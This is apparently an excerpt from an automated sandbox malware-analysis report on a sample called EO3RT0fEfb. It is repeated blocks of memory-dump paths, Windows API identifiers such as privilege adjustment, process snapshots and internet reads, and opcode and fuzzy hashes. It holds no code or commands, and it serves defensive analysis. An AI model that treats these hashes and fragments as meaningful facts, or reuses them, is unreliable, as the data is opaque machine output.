                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CurrentProcess_invalid_parameter_noinfo
                                                            • String ID: *$.$.
                                                            • API String ID: 2518042432-2112782162
                                                            • Opcode ID: 12e9b60bd7894d2062c92085e89256868bb5cd1afb156a995e7c5da927ea5a3f
                                                            • Instruction ID: d34c7187c25a73881db0e39c14670942f9d3bca8f7b6e88ace017b5b1380ff64
                                                            • Opcode Fuzzy Hash: 12e9b60bd7894d2062c92085e89256868bb5cd1afb156a995e7c5da927ea5a3f
                                                            • Instruction Fuzzy Hash: E751E262F11BD585FF11EBA6AA001FDA7A4BB44BC8F984135CE0D1BB89DF38D4428321
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 2163645468-3733053543
                                                            • Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                            • Instruction ID: 0f88e13b3774e34787efad5e724067bd7e883858cfdd1fb094ca948ebacff191
                                                            • Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                            • Instruction Fuzzy Hash: A1119432B18A8282EF18EB25B4415FEF251BF84794FCD4135E64D83999EF3CD8058760
                                                            APIs
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF75F165C43
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: DebugDebuggerErrorLastOutputPresentString
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 389471666-631824599
                                                            • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                            • Instruction ID: d530b90a81fd13ce2d2400c3da224489c61e450d58f12249d5a94de95c1fdce4
                                                            • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                            • Instruction Fuzzy Hash: 99110D32A14BC296EB44AB22E6553F973A5FB44359F884135C64D82A50EF3CE4B4C720
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                            • Instruction ID: 482378e3375672c0b94be6baaa7bf4991e289849e6a91352c43da0facc296606
                                                            • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                            • Instruction Fuzzy Hash: CCE0ED61915F4682EF14AB14F8547A863E0FB18B48FC80835DA1D45354EF7CD699C360
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID: Variable must be of type 'Object'.
                                                            • API String ID: 1385522511-109567571
                                                            • Opcode ID: 09b0c8642434f20ce4b814200726c115a0bcc0e38a9d6de865f3abdb52dfbc80
                                                            • Instruction ID: 771faca459cfe82a244756ead3ffbddb18aca69eb60b259f9f4fb04e586c7b2b
                                                            • Opcode Fuzzy Hash: 09b0c8642434f20ce4b814200726c115a0bcc0e38a9d6de865f3abdb52dfbc80
                                                            • Instruction Fuzzy Hash: 57C29172A08AC682EF64EF19F4542F9A362FB44B84F984132DA4E47795DF3DE441CB60
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 1083639309-0
                                                            • Opcode ID: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                            • Instruction ID: a8378e33150d8067313ba5fdb593a479c8aa52b92e20063762c1ff7b02ebd1d2
                                                            • Opcode Fuzzy Hash: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                            • Instruction Fuzzy Hash: 62414F26A18AC296EB10FF51F4845EAA764FB84B84FD98036EA4E03A55EF7CD905C710
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID:
                                                            • API String ID: 1385522511-0
                                                            • Opcode ID: 60f9666ca451ed35fe8ab7f9d9e10171ddfa37ac04d0aa9f8a10e9c9a443c8f8
                                                            • Instruction ID: 55f90fe08ba982c444f7b81ec8f195ccf9616b238448bf6ff7d48f8da3af647c
                                                            • Opcode Fuzzy Hash: 60f9666ca451ed35fe8ab7f9d9e10171ddfa37ac04d0aa9f8a10e9c9a443c8f8
                                                            • Instruction Fuzzy Hash: A9827972A08AD286EF54EF19F4946F9A3A1FB54B84F980036DA4E47794DF3DE441CB20
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $[$\
                                                            • API String ID: 0-3681541464
                                                            • Opcode ID: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                            • Instruction ID: 19a35f52784a3fca44e2dd7ae5b4823736dab4d32cd40a296486cfa3c521e482
                                                            • Opcode Fuzzy Hash: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                            • Instruction Fuzzy Hash: A8B29C72B096928AEB249F75E4406FCB7B1FB04748F984136CA4D57B88EF39E941C790
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: memcpy_s
                                                            • String ID:
                                                            • API String ID: 1502251526-0
                                                            • Opcode ID: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                            • Instruction ID: a095a42c9301d5446c7d8c7d797721e2aa830dbf90cf0f9b74ac39bccd11309d
                                                            • Opcode Fuzzy Hash: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                            • Instruction Fuzzy Hash: 30D1AF32B192C687DB249F15F1846AAB6A1FB88784F989135CB4E67B44DF3CE945CB00
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                            • String ID:
                                                            • API String ID: 2278415577-0
                                                            • Opcode ID: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                            • Instruction ID: 6bfe675be2b4329bdb0f6f76476aaba80d274c306f94b1ae2640f282fac38d48
                                                            • Opcode Fuzzy Hash: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                            • Instruction Fuzzy Hash: 0721AC72A08A8186DB04EF26F4402AAB7A0FB88BD4F888435DF8D07B18CF78D556C750
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                            • String ID:
                                                            • API String ID: 33631002-0
                                                            • Opcode ID: a8212eb04a4308763a1976214b907e8d9402944d66f39c78de83db0e04bb04f6
                                                            • Instruction ID: 6a83cb0eb04b80286e967d623bd0a0e2466040fac1957d59899487c3a01762dc
                                                            • Opcode Fuzzy Hash: a8212eb04a4308763a1976214b907e8d9402944d66f39c78de83db0e04bb04f6
                                                            • Instruction Fuzzy Hash: 93119036608B8087E7509B14F48054EB7E4F784BA0F64423ADBAD43B64DF7CD855CB00
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                            • Instruction ID: a3b132cd45cb5754568d4d5caff1c7cbe18237891c4b6385056dc7476c11f7c4
                                                            • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                            • Instruction Fuzzy Hash: 140180336247818FEB108F20E4953A973B0F75476EF440929E64986A98CF7DC159CF90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .
                                                            • API String ID: 0-248832578
                                                            • Opcode ID: 704ebd355b677e1258a9e20fb2f824619711b00144154a2c45bc08c04a856543
                                                            • Instruction ID: fdf5c3f7467490b406954717295ccb53fd01590fa03b2fa9eedc3edd06638563
                                                            • Opcode Fuzzy Hash: 704ebd355b677e1258a9e20fb2f824619711b00144154a2c45bc08c04a856543
                                                            • Instruction Fuzzy Hash: 39311551B186D244FF60AE62A9046BAE691FB50BE4F8C8635EE5D07BC8DF3CD5018210
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF75F17475C,?,?,00000000,00007FF75F1747D9,?,?,?,?,?,00007FF75F1C2210), ref: 00007FF75F17BF3F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Time$FileSystem
                                                            • String ID: GetSystemTimePreciseAsFileTime
                                                            • API String ID: 2086374402-595813830
                                                            • Opcode ID: 572b71549e45f6bab70ab7a1e99299a405b58e83dcd9cf08a8343814aa6f0cc3
                                                            • Instruction ID: 018f3c6f23b83393410dcf1b0bb68b5e60ecf05f7808ccd85b7225a47c1d7b78
                                                            • Opcode Fuzzy Hash: 572b71549e45f6bab70ab7a1e99299a405b58e83dcd9cf08a8343814aa6f0cc3
                                                            • Instruction Fuzzy Hash: 1DF01C10A1A6C791EE04BB51F5440F4A211AF44BC0FCC6031DA0E06356DF3CD4458734
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise_clrfp
                                                            • String ID:
                                                            • API String ID: 15204871-0
                                                            • Opcode ID: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                            • Instruction ID: 69794adc99b25523e1e0f3ffce66def927e8a5f3c692e0808279be23b9dbce54
                                                            • Opcode Fuzzy Hash: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                            • Instruction Fuzzy Hash: 95B17B73A04B858BEB15DF29D9463AC7BA0F784B48F588821DB9D837A4CF39D851C711
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: a54c6d4a74e6411871131af3bdbcf589181ad988d0891215d2ce77e29c03cb3f
                                                            • Instruction ID: 4c7d88140331dbe61aa3eef6e189744f510c896d8ba14cf771ab9af488eda1e3
                                                            • Opcode Fuzzy Hash: a54c6d4a74e6411871131af3bdbcf589181ad988d0891215d2ce77e29c03cb3f
                                                            • Instruction Fuzzy Hash: 4831A232B04A818AFF58EE26E4507F9A7A1FB84BD8F984435DE0E47B98DF39D4418314
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                            • Instruction ID: c62e22fadde1624c0381987c29db20773944ce2086279e661aa73a35dd00375e
                                                            • Opcode Fuzzy Hash: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                            • Instruction Fuzzy Hash: 80117C32B0878186DF00EF2AE0843A8B760FB88BA0F598631DB6D07795DF7CD4518720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                            • Instruction ID: b4e9978c80a459199ae1cb576684fd6d8c9efee1c432401ce7c5e094dde6fc2b
                                                            • Opcode Fuzzy Hash: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                            • Instruction Fuzzy Hash: 84F0C871A0878241EB206B56F4456AAE6A5FFC9794F985134EB9D43B99DF3CC0058B10
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
                                                            • Instruction ID: c00a1f9c811cf17a3a24f89c6092a64ba8b641114cd9388742388a0fd6db9fe4
                                                            • Opcode Fuzzy Hash: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
                                                            • Instruction Fuzzy Hash: 37F06566A14AC582EF54EB61E4553F99360FBD8F98F684532CF4D07754CF3CD0868260
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
